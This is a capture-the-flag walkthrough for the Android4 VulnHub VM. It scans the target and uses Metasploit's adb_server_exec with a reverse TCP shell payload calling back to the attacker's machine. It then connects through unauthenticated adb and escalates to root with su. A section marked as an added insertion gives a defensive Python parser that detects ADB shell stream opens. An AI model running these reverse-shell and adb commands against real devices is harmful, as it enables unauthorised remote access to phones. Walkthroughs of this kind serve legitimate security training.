Hack the Android4: Walkthrough (CTF Challenge)


Hello everyone, and welcome to yet another CTF challenge walkthrough. This time we’ll be getting our hands on Android4, which was made by Touhid Shaikh. You can download this vulnerable VM here (https://www.vulnhub.com/entry/android4-1,233/).
I would rate the difficulty of this vulnerable VM as beginner.

Steps involved:
1. Port scanning and IP discovery
2. Attacking port 8080 proxy using adb_server_exec
3. Connection to the device using ADB.
4. Shell grabbing.
5. Privilege escalation and reading congratulatory flag.

Let’s get started then!
First we’ll grab the IP address using the netdiscover utility that ships with Kali Linux.

netdiscover




In my case the IP address is 192.168.1.105

The second step is, as usual, port scanning. Here we run an aggressive scan of all ports using the most popular tool, nmap.

nmap -p- -A 192.168.1.105




From this we established that some kind of web page is served on port 8080.
Without any delay we opened the web page but found nothing.




Anyone would suspect that some kind of HTTP verb tampering is involved, using the POST method. We tried it but didn’t find anything useful.
After trying a few other methods (PHP CLI and Dropbear RCE), here is the one we found best suited to our purpose.





Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. It is a client-server program that includes three components:
·      A client, which sends commands. The client runs on your development machine. You can invoke a client from a command-line terminal by issuing an adb command.
·      A daemon (adbd), which runs commands on a device. The daemon runs as a background process on each device.
·      A server, which manages communication between the client and the daemon. The server runs as a background process on your development machine.
When you start an adb client, the client first checks whether there is an adb server process already running. If there isn't, it starts the server process.
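Because the daemon on this VM accepts connections on TCP port 5555 without authentication, the same client/daemon exchange described above is what shows up in a packet capture of the session. The following is an added example (not code from the original post or from the Android project) that parses ADB wire messages from a captured byte stream so a defender can recognise them and flag a stream open that requests a shell. It assumes the publicly documented ADB message layout (six little-endian uint32 words: command, arg0, arg1, data_length, data_check, magic) and the classic maxdata value of 4096; the sample stream at the bottom is constructed inline.

```python
import struct
from typing import Dict, Iterator, Optional

# ADB message header: six little-endian uint32 words
# (command, arg0, arg1, data_length, data_check, magic), followed by the payload.
HEADER = struct.Struct("<6I")


def _cmd(tag: bytes) -> int:
    """A command identifier is its four ASCII bytes read as a little-endian uint32."""
    return int.from_bytes(tag, "little")


A_CNXN = _cmd(b"CNXN")   # connect: arg0 = protocol version, arg1 = max payload, data = identity
A_AUTH = _cmd(b"AUTH")   # RSA authentication (never sent by a daemon with auth disabled)
A_OPEN = _cmd(b"OPEN")   # open a stream: arg0 = local id, data = destination ("shell:", ...) + NUL
A_OKAY = _cmd(b"OKAY")
A_CLSE = _cmd(b"CLSE")
A_WRTE = _cmd(b"WRTE")
KNOWN_COMMANDS = {A_CNXN, A_AUTH, A_OPEN, A_OKAY, A_CLSE, A_WRTE}

A_VERSION = 0x01000000   # protocol version carried in CNXN arg0
MAX_PAYLOAD = 4096       # classic maxdata value carried in CNXN arg1 (assumption for the sample)


def payload_check(data: bytes) -> int:
    """The 'crc32' header word is in fact the plain byte sum of the payload, mod 2**32."""
    return sum(data) & 0xFFFFFFFF


def build_message(command: int, arg0: int, arg1: int, data: bytes = b"") -> bytes:
    """Serialise one ADB message; magic is the command word XOR 0xFFFFFFFF."""
    header = HEADER.pack(command, arg0, arg1, len(data),
                         payload_check(data), command ^ 0xFFFFFFFF)
    return header + data


def build_cnxn(identity: str = "host::") -> bytes:
    """The first message an adb client sends after 'adb connect': its identity string."""
    return build_message(A_CNXN, A_VERSION, MAX_PAYLOAD, identity.encode())


def parse_message(buf: bytes) -> Optional[Dict[str, object]]:
    """Parse one message from the start of buf; return None unless every header check passes."""
    if len(buf) < HEADER.size:
        return None
    command, arg0, arg1, length, check, magic = HEADER.unpack_from(buf)
    if magic != (command ^ 0xFFFFFFFF) or command not in KNOWN_COMMANDS:
        return None
    data = bytes(buf[HEADER.size:HEADER.size + length])
    if len(data) != length or payload_check(data) != check:
        return None
    return {
        "command": command.to_bytes(4, "little").decode("ascii"),
        "arg0": arg0,
        "arg1": arg1,
        "payload": data,
        "size": HEADER.size + length,
    }


def iter_messages(buf: bytes) -> Iterator[Dict[str, object]]:
    """Walk one direction of a captured TCP 5555 stream, stopping at the first malformed message."""
    offset = 0
    while offset < len(buf):
        msg = parse_message(buf[offset:])
        if msg is None:
            return
        yield msg
        offset += msg["size"]


def describe(msg: Dict[str, object]) -> str:
    """One-line summary for a detection log; flags stream opens that request a shell."""
    payload = msg["payload"]
    if msg["command"] == "CNXN":
        ident = payload.decode(errors="replace")
        return f"CNXN version={msg['arg0']:#010x} maxdata={msg['arg1']} identity={ident!r}"
    if msg["command"] == "OPEN":
        dest = payload.rstrip(b"\0").decode(errors="replace")
        note = " [shell requested]" if dest.startswith("shell:") else ""
        return f"OPEN local-id={msg['arg0']} dest={dest!r}{note}"
    return f"{msg['command']} arg0={msg['arg0']} arg1={msg['arg1']} len={len(payload)}"


# Constructed sample stream: the client side of a connect followed by a shell stream open.
SAMPLE_STREAM = build_cnxn("host::") + build_message(A_OPEN, 1, 0, b"shell:\0")

if __name__ == "__main__":
    for m in iter_messages(SAMPLE_STREAM):
        print(describe(m))
```

Feeding the client-to-device half of a TCP 5555 session into iter_messages lets a sensor tell real ADB traffic from random data on that port (the magic word and byte-sum check both have to hold), and the "[shell requested]" marker on an OPEN is the event worth alerting on when no authentication (AUTH) exchange preceded it.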

To start the ADB server we used Metasploit:

use exploit/android/adb/adb_server_exec
set RHOST 192.168.1.105
set payload linux/armle/shell_reverse_tcp
set LHOST 192.168.1.108
set LPORT 3333
exploit

(It is quite possible that the local port won’t accept the connection. In that case we changed the default port from 4444 to 3333.)




If you don’t have adb installed, you can install it with the command:

sudo apt-get install adb




Once the status shows “Connecting to device”, open a new terminal window and type the commands:

adb connect 192.168.1.105:5555
adb shell
In shell:
ls




To go to the default directory and switch to root:
cd
su
Voila! We got a root shell!




In the /data directory we found a folder called “root”:
cd /data
ls
The final step was reading the congratulatory flag:
cd /root
ls
cat flag.txt

